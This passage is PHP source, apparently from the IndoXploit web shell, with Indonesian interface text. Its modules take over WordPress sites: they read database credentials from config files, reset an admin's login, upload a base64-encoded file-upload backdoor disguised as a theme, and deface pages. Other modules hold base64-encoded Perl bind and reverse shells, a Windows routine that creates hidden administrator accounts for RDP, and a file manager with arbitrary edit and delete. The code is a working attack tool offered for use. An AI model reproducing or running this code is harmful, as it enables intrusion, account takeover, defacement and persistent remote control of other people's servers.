1395.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1396.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1397.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1398.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1399.             $data = curl_exec($ch);
1400.                   curl_close($ch);
1401.             return $data;
1402.         }
1403.         $scan = $_POST['link_config'];
1404.         $link_config = scandir($scan);
1405.         $script = htmlspecialchars($_POST['script']);
1406.         $user = "indoxploit";
1407.         $pass = "indoxploit";
1408.         $passx = md5($pass);
1409.         foreach($link_config as $dir_config) {
1410.             if(!is_file("$scan/$dir_config")) continue;
1411.             $config = file_get_contents("$scan/$dir_config");
1412.             if(preg_match("/WordPress/", $config)) {
1413.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1414.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1415.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1416.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1417.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1418.                 $prefix = $dbprefix."users";
1419.                 $option = $dbprefix."options";
1420.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1421.                 $db = mysql_select_db($dbname);
1422.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1423.                 $result = mysql_fetch_array($q);
1424.                 $id = $result[ID];
1425.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1426.                 $result2 = mysql_fetch_array($q2);
1427.                 $target = $result2[option_value];
1428.                 if($target == '') {                
1429.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1430.                 } else {
1431.                     echo "[+] $target <br>";
1432.                 }
1433.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1434.                 if(!$conn OR !$db OR !$update) {
1435.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1436.                     mysql_close($conn);
1437.                 } else {
1438.                     $site = "$target/wp-login.php";
1439.                     $site2 = "$target/wp-admin/theme-install.php?upload";
1440.                     $b1 = anucurl($site2);
1441.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1442.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1443.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1444.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1445.                     $www = "m.php";
1446.                     $fp5 = fopen($www,"w");
1447.                     fputs($fp5,$upload3);
1448.                     $post2 = array(
1449.                             "_wpnonce" => "$anu2",
1450.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1451.                             "themezip" => "@$www",
1452.                             "install-theme-submit" => "Install Now",
1453.                             );
1454.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1455.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1456.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1457.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1458.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1459.                           curl_setopt($ch, CURLOPT_POST, 1);
1460.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1461.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1462.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1463.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1464.                     $data3 = curl_exec($ch);
1465.                           curl_close($ch);
1466.                     $y = date("Y");
1467.                     $m = date("m");
1468.                     $namafile = "id.php";
1469.                     $fpi = fopen($namafile,"w");
1470.                     fputs($fpi,$script);
1471.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1472.                            curl_setopt($ch6, CURLOPT_POST, true);
1473.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1474.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1475.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1476.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1477.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
1478.                     $postResult = curl_exec($ch6);
1479.                            curl_close($ch6);
1480.                     $as = "$target/k.php";
1481.                     $bs = anucurl($as);
1482.                     if(preg_match("#$script#is", $bs)) {
1483.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1484.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1485.                         } else {
1486.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
1487.                         echo "[!!] coba aja manual: <br>";
1488.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1489.                         echo "[+] username: <font color=lime>$user</font><br>";
1490.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
1491.                         }
1492.                     mysql_close($conn);
1493.                 }
1494.             }
1495.         }
1496.     } else {
1497.         echo "<center><h1>WordPress Auto Deface</h1>
1498.        <form method='post'>
1499.        <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
1500.        <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1501.        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1502.        </form>
1503.        <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
1504.        </center>";
1505.     }
1506. } elseif($_GET['do'] == 'auto_dwp2') {
1507.     if($_POST['auto_deface_wp']) {
1508.         function anucurl($sites) {
1509.             $ch = curl_init($sites);
1510.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1511.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1512.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1513.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1514.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1515.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1516.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1517.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1518.                   curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1519.             $data = curl_exec($ch);
1520.                   curl_close($ch);
1521.             return $data;
1522.         }
1523.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1524.             $post = array(
1525.                    "log" => "$userr",
1526.                    "pwd" => "$pass",
1527.                    "rememberme" => "forever",
1528.                    "wp-submit" => "$wp_submit",
1529.                    "redirect_to" => "$web",
1530.                    "testcookie" => "1",
1531.                    );
1532.             $ch = curl_init($cek);
1533.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1534.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1535.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1536.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1537.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1538.                   curl_setopt($ch, CURLOPT_POST, 1);
1539.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1540.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1541.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1542.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1543.             $data = curl_exec($ch);
1544.                   curl_close($ch);
1545.             return $data;
1546.         }
1547.         $link = explode("\r\n", $_POST['link']);
1548.         $script = htmlspecialchars($_POST['script']);
1549.         $user = "indoxploit";
1550.         $pass = "indoxploit";
1551.         $passx = md5($pass);
1552.         foreach($link as $dir_config) {
1553.             $config = anucurl($dir_config);
1554.             $dbhost = ambilkata($config,"DB_HOST', '","'");
1555.             $dbuser = ambilkata($config,"DB_USER', '","'");
1556.             $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1557.             $dbname = ambilkata($config,"DB_NAME', '","'");
1558.             $dbprefix = ambilkata($config,"table_prefix  = '","'");
1559.             $prefix = $dbprefix."users";
1560.             $option = $dbprefix."options";
1561.             $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1562.             $db = mysql_select_db($dbname);
1563.             $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1564.             $result = mysql_fetch_array($q);
1565.             $id = $result[ID];
1566.             $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1567.             $result2 = mysql_fetch_array($q2);
1568.             $target = $result2[option_value];
1569.             if($target == '') {                
1570.                 echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
1571.             } else {
1572.                 echo "[+] $target <br>";
1573.             }
1574.             $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1575.             if(!$conn OR !$db OR !$update) {
1576.                 echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1577.                 mysql_close($conn);
1578.             } else {
1579.                 $site = "$target/wp-login.php";
1580.                 $site2 = "$target/wp-admin/theme-install.php?upload";
1581.                 $b1 = anucurl($site2);
1582.                 $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
1583.                 $b = lohgin($site, $site2, $user, $pass, $wp_sub);
1584.                 $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
1585.                 $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
1586.                 $www = "m.php";
1587.                 $fp5 = fopen($www,"w");
1588.                 fputs($fp5,$upload3);
1589.                 $post2 = array(
1590.                         "_wpnonce" => "$anu2",
1591.                         "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
1592.                         "themezip" => "@$www",
1593.                         "install-theme-submit" => "Install Now",
1594.                         );
1595.                 $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
1596.                       curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1597.                       curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1598.                       curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1599.                       curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1600.                       curl_setopt($ch, CURLOPT_POST, 1);
1601.                       curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
1602.                       curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1603.                       curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1604.                       curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1605.                 $data3 = curl_exec($ch);
1606.                       curl_close($ch);
1607.                 $y = date("Y");
1608.                 $m = date("m");
1609.                 $namafile = "id.php";
1610.                 $fpi = fopen($namafile,"w");
1611.                 fputs($fpi,$script);
1612.                 $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
1613.                        curl_setopt($ch6, CURLOPT_POST, true);
1614.                        curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
1615.                        curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
1616.                        curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
1617.                        curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
1618.                        curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
1619.                 $postResult = curl_exec($ch6);
1620.                        curl_close($ch6);
1621.                 $as = "$target/k.php";
1622.                 $bs = anucurl($as);
1623.                 if(preg_match("#$script#is", $bs)) {
1624.                     echo "[+] <font color='lime'>berhasil mepes...</font><br>";
1625.                     echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
1626.                     } else {
1627.                     echo "[-] <font color='red'>gagal mepes...</font><br>";
1628.                     echo "[!!] coba aja manual: <br>";
1629.                     echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
1630.                     echo "[+] username: <font color=lime>$user</font><br>";
1631.                     echo "[+] password: <font color=lime>$pass</font><br><br>";    
1632.                     }
1633.                 mysql_close($conn);
1634.             }
1635.         }
1636.     } else {
1637.         echo "<center><h1>WordPress Auto Deface V.2</h1>
1638.        <form method='post'>
1639.        Link Config: <br>
1640.        <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1641.        <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
1642.        <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
1643.        </form></center>";
1644.     }
1645. } elseif($_GET['do'] == 'network') {
1646.     echo "<form method='post'>
1647.    <u>Bind Port:</u> <br>
1648.    PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
1649.    <input type='submit' name='sub_bp' value='>>'>
1650.    </form>
1651.    <form method='post'>
1652.    <u>Back Connect:</u> <br>
1653.    Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
1654.    PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
1655.    <input type='submit' name='sub_bc' value='>>'>
1656.    </form>";
1657.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1658.     if(isset($_POST['sub_bp'])) {
1659.         $f_bp = fopen("/tmp/bp.pl", "w");
1660.         fwrite($f_bp, base64_decode($bind_port_p));
1661.         fclose($f_bp);
1662.  
1663.         $port = $_POST['port_bind'];
1664.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
1665.         sleep(1);
1666.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
1667.         unlink("/tmp/bp.pl");
1668.     }
1669.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1670.     if(isset($_POST['sub_bc'])) {
1671.         $f_bc = fopen("/tmp/bc.pl", "w");
1672.         fwrite($f_bc, base64_decode($bind_connect_p));
1673.         fclose($f_bc);
1674.  
1675.         $ipbc = $_POST['ip_bc'];
1676.         $port = $_POST['port_bc'];
1677.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
1678.         sleep(1);
1679.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
1680.         unlink("/tmp/bc.pl");
1681.     }
1682. } elseif($_GET['do'] == 'krdp_shell') {
1683.     if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1684.         if($_POST['create']) {
1685.             $user = htmlspecialchars($_POST['user']);
1686.             $pass = htmlspecialchars($_POST['pass']);
1687.             if(preg_match("/$user/", exe("net user"))) {
1688.                 echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1689.             } else {
1690.                 $add_user   = exe("net user $user $pass /add");
1691.                 $add_groups1 = exe("net localgroup Administrators $user /add");
1692.                 $add_groups2 = exe("net localgroup Administrator $user /add");
1693.                 $add_groups3 = exe("net localgroup Administrateur $user /add");
1694.                 echo "[ RDP ACCOUNT INFO ]<br>
1695.                ------------------------------<br>
1696.                IP: <font color=lime>".$ip."</font><br>
1697.                Username: <font color=lime>$user</font><br>
1698.                Password: <font color=lime>$pass</font><br>
1699.                ------------------------------<br><br>
1700.                [ STATUS ]<br>
1701.                ------------------------------<br>
1702.                ";
1703.                 if($add_user) {
1704.                     echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1705.                 } else {
1706.                     echo "[add user] -> <font color='red'>Gagal</font><br>";
1707.                 }
1708.                 if($add_groups1) {
1709.                     echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1710.                 } elseif($add_groups2) {
1711.                     echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1712.                 } elseif($add_groups3) {
1713.                     echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1714.                 } else {
1715.                     echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1716.                 }
1717.                 echo "------------------------------<br>";
1718.             }
1719.         } elseif($_POST['s_opsi']) {
1720.             $user = htmlspecialchars($_POST['r_user']);
1721.             if($_POST['opsi'] == '1') {
1722.                 $cek = exe("net user $user");
1723.                 echo "Checking username <font color=lime>$user</font> ....... ";
1724.                 if(preg_match("/$user/", $cek)) {
1725.                     echo "[ <font color=lime>Sudah ada</font> ]<br>
1726.                    ------------------------------<br><br>
1727.                    <pre>$cek</pre>";
1728.                 } else {
1729.                     echo "[ <font color=red>belum ada</font> ]";
1730.                 }
1731.             } elseif($_POST['opsi'] == '2') {
1732.                 $cek = exe("net user $user indoxploit");
1733.                 if(preg_match("/$user/", exe("net user"))) {
1734.                     echo "[change password: <font color=lime>indoxploit</font>] -> ";
1735.                     if($cek) {
1736.                         echo "<font color=lime>Berhasil</font>";
1737.                     } else {
1738.                         echo "<font color=red>Gagal</font>";
1739.                     }
1740.                 } else {
1741.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1742.                 }
1743.             } elseif($_POST['opsi'] == '3') {
1744.                 $cek = exe("net user $user /DELETE");
1745.                 if(preg_match("/$user/", exe("net user"))) {
1746.                     echo "[remove user: <font color=lime>$user</font>] -> ";
1747.                     if($cek) {
1748.                         echo "<font color=lime>Berhasil</font>";
1749.                     } else {
1750.                         echo "<font color=red>Gagal</font>";
1751.                     }
1752.                 } else {
1753.                     echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1754.                 }
1755.             } else {
1756.                 //
1757.             }
1758.         } else {
1759.             echo "-- Create RDP --<br>
1760.            <form method='post'>
1761.            <input type='text' name='user' placeholder='username' value='indoxploit' required>
1762.            <input type='text' name='pass' placeholder='password' value='indoxploit' required>
1763.            <input type='submit' name='create' value='>>'>
1764.            </form>
1765.            -- Option --<br>
1766.            <form method='post'>
1767.            <input type='text' name='r_user' placeholder='username' required>
1768.            <select name='opsi'>
1769.            <option value='1'>Cek Username</option>
1770.            <option value='2'>Ubah Password</option>
1771.            <option value='3'>Hapus Username</option>
1772.            </select>
1773.            <input type='submit' name='s_opsi' value='>>'>
1774.            </form>
1775.            ";
1776.         }
1777.     } else {
1778.         echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1779.     }
1780. } elseif($_GET['act'] == 'newfile') {
1781.     if($_POST['new_save_file']) {
1782.         $newfile = htmlspecialchars($_POST['newfile']);
1783.         $fopen = fopen($newfile, "a+");
1784.         if($fopen) {
1785.             $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
1786.         } else {
1787.             $act = "<font color=red>permission denied</font>";
1788.         }
1789.     }
1790.     echo $act;
1791.     echo "<form method='post'>
1792.    Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
1793.    <input type='submit' name='new_save_file' value='Submit'>
1794.    </form>";
1795. } elseif($_GET['act'] == 'newfolder') {
1796.     if($_POST['new_save_folder']) {
1797.         $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
1798.         if(!mkdir($new_folder)) {
1799.             $act = "<font color=red>permission denied</font>";
1800.         } else {
1801.             $act = "<script>window.location='?dir=".$dir."';</script>";
1802.         }
1803.     }
1804.     echo $act;
1805.     echo "<form method='post'>
1806.    Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
1807.    <input type='submit' name='new_save_folder' value='Submit'>
1808.    </form>";
1809. } elseif($_GET['act'] == 'rename_dir') {
1810.     if($_POST['dir_rename']) {
1811.         $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
1812.         if($dir_rename) {
1813.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1814.         } else {
1815.             $act = "<font color=red>permission denied</font>";
1816.         }
1817.     echo "".$act."<br>";
1818.     }
1819.     echo "<form method='post'>
1820.    <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
1821.    <input type='submit' name='dir_rename' value='rename'>
1822.    </form>";
1823. } elseif($_GET['act'] == 'delete_dir') {
1824.     if(is_dir($dir)) {
1825.         if(is_writable($dir)) {
1826.             @rmdir($dir);
1827.             @exe("rm -rf $dir");
1828.             @exe("rmdir /s /q $dir");
1829.             $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
1830.         } else {
1831.             $act = "<font color=red>could not remove ".basename($dir)."</font>";
1832.         }
1833.     }
1834.     echo $act;
1835. } elseif($_GET['act'] == 'view') {
1836.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1837.     echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
1838. } elseif($_GET['act'] == 'edit') {
1839.     if($_POST['save']) {
1840.         $save = file_put_contents($_GET['file'], $_POST['src']);
1841.         if($save) {
1842.             $act = "<font color=lime>Saved!</font>";
1843.         } else {
1844.             $act = "<font color=red>permission denied</font>";
1845.         }
1846.     echo "".$act."<br>";
1847.     }
1848.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1849.     echo "<form method='post'>
1850.    <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
1851.    <input type='submit' value='Save' name='save' style='width: 500px;'>
1852.    </form>";
1853. } elseif($_GET['act'] == 'rename') {
1854.     if($_POST['do_rename']) {
1855.         $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
1856.         if($rename) {
1857.             $act = "<script>window.location='?dir=".$dir."';</script>";
1858.         } else {
1859.             $act = "<font color=red>permission denied</font>";
1860.         }
1861.     echo "".$act."<br>";
1862.     }
1863.     echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
1864.     echo "<form method='post'>
1865.    <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
1866.    <input type='submit' name='do_rename' value='rename'>
1867.    </form>";
1868. } elseif($_GET['act'] == 'delete') {
1869.     $delete = unlink($_GET['file']);
1870.     if($delete) {
1871.         $act = "<script>window.location='?dir=".$dir."';</script>";
1872.     } else {
1873.         $act = "<font color=red>permission denied</font>";
1874.     }
1875.     echo $act;
1876. } else {
1877.     if(is_dir($dir) === true) {
1878.         if(!is_readable($dir)) {
1879.             echo "<font color=red>can't open directory. ( not readable )</font>";
1880.         } else {
1881.             echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
1882.            <tr>
1883.            <th class="th_home"><center>Name</center></th>
1884.            <th class="th_home"><center>Type</center></th>
1885.            <th class="th_home"><center>Size</center></th>
1886.            <th class="th_home"><center>Last Modified</center></th>
1887.            <th class="th_home"><center>Owner/Group</center></th>
1888.            <th class="th_home"><center>Permission</center></th>
1889.            <th class="th_home"><center>Action</center></th>
1890.            </tr>';
1891.             $scandir = scandir($dir);
1892.             foreach($scandir as $dirx) {
1893.                 $dtype = filetype("$dir/$dirx");
1894.                 $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
1895.                 if(function_exists('posix_getpwuid')) {
1896.                     $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
1897.                     $downer = $downer['name'];
1898.                 } else {
1899.                     //$downer = $uid;
1900.                     $downer = fileowner("$dir/$dirx");
1901.                 }
1902.                 if(function_exists('posix_getgrgid')) {
1903.                     $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
1904.                     $dgrp = $dgrp['name'];
1905.                 } else {
1906.                     $dgrp = filegroup("$dir/$dirx");
1907.                 }
1908.                 if(!is_dir("$dir/$dirx")) continue;
1909.                 if($dirx === '..') {
1910.                     $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
1911.                 } elseif($dirx === '.') {
1912.                     $href = "<a href='?dir=$dir'>$dirx</a>";
1913.                 } else {
1914.                     $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
1915.                 }
1916.                 if($dirx === '.' || $dirx === '..') {
1917.                     $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
1918.                     } else {
1919.                     $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
1920.                 }
1921.                 echo "<tr>";
1922.                 echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
1923.                 echo "<td class='td_home'><center>$dtype</center></td>";
